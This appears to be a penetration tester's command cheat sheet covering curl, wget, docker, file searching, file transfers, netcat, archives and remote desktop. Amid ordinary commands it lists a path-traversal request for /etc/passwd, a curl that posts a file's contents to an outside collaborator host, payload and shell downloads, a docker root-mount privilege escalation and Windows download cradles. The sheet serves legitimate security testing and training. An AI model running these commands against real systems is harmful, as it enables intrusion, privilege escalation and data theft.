$ curl --proxy http://127.0.0.1:8080

$ curl --path-as-is http://$IP/../../../../../../etc/passwd

$ cat file.txt | curl -X POST -d @- http://burp.collaborator

wget

# download files with wget
$ wget http://$IP/xxx.sh

# run files without downloading
$ wget -O - http://$IP:<port>:lin(peas\|enum).sh

# download file and save it somewhere (tmp)
$ wget -O /tmp/shell.elf $IP/shell.elf

docker

# https://blog.ropnop.com/docker-for-pentesters/

$ docker version
$ docker info
$ docker pull registry:5000/alpine
$ docker inspect <container-id>
$ docker network ls
$ docker image ls
$ docker image history <image-name>
$ docker port <container-id>
$ docker rmi <image-name>
$ docker system prune -a
$ docker ps -a
$ docker start <container-id>
$ docker stop <container-id>
$ docker rm <container-id>

$ docker exec -it <container-id> /bin/sh # Get shell inside a container
$ docker run -it -v /:/host/ <image-name> chroot /host/ bash # Privesc technique
$ docker cp <container-id>:/etc/passwd exfil_passwd
$ docker exec <container-id> <command>

Finding and Locating Files

# find with file names
$ find . -name user.txt 

# find and execute
$ find . -name '*.txt' -exec cat "{}" \;

# find files with specific string in it
$ find . -type f -print0 | xargs -0 -e grep -niH -e "string"

# find certain file and exclude files from /proc/ and /sys/ directories
$ find / -name Settings.* 2>/dev/null | grep -v '/proc/' | grep -v '/sys/'

# List various available nmap scripts
$ locate scripts/citrix

File Transfers

SMB Server

# start server
$ impacket-smbserver share . -smb2support -user user -password password

# use server
C:\> net use \\$IP\share /USER:user password
smb> copy \\$IP\share\nc.exe .

HTTP

$ python3 -m http.server 80
$ service apache2 start
$ ngrok http 80

C:\> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://$IP/file.exe','C:\Users\user\Desktop\file.exe')"
C:\> iwr -uri http://$IP/file -Outfile file
C:\> wget http://$IP/file -O file
C:\> curl http://$IP/file -o file
C:\> certutil -urlcache -split -f http://$IP:8000/ok.exe ok.exe  

# ways to download file
$ wget http://$IP/file
$ curl http://$IP/file > file

scp

$ scp file user@$IP:/tmp/

nc

# receiver
$ nc -l -p 1234 > out.file 
# sender
$ nc -w 3 <dest_ip> 1234 < out.file

Decompressing Files

# unzip a zip file
$ unzip file.zip

# extract a .tar file
$ tar -xvf file.tar

# extract a .tar file from output
$ dd if=backup.ab bs=1 skip=24  | python -c 'import sys,zlib;sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))' | tar -xvf -

# unzip a *.tar.gz file
$ tar -xzvf file.tar.gz

watch

# monitor, repeat the same command for a period of time
# ls -la every 1 sec on a dir
$ watch -n 1 'ls -la'

# repeat executing the command
$ watch <command>
 
# execute the commands in specific intervals
$ watch -n <seconds> <command>

# highlight the differences in each execution ## Thanks copycookie.com 
$ watch -n <seconds> -d <command> 

# exit on changes
$ watch -g <command>

loops

# for loop that adds payload += in each line of the file
$ for i in $(cat hexdata); do echo "payload += b'$i'"; done

git

# https://github.com/arthaud/git-dumper

$ git log
$ git show <commit-id>

vim

x # cut character
dw # cut word
dd # cut full line
yw # copy word
yy # copy full line
p # paste
:1 # go to line number 1
:q! # quit without saving

Remote Desktop

# Connect to a Windows target using the Remote Desktop Protocol.
$ xfreerdp /v:IP /u:username /p:password /clipboard /dynamic-resolution

$ xfreerdp /d:'<domain_name>' /u:'<username>' /p:'<password>' /v:<host|ip> /size:95% /cert:ignore +clipboard +drive:<adhoc_sharing_folder_name>,</path/to/share/>

Fixing SSH Keys

❯ dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...
❯ echo "" >> id_rsa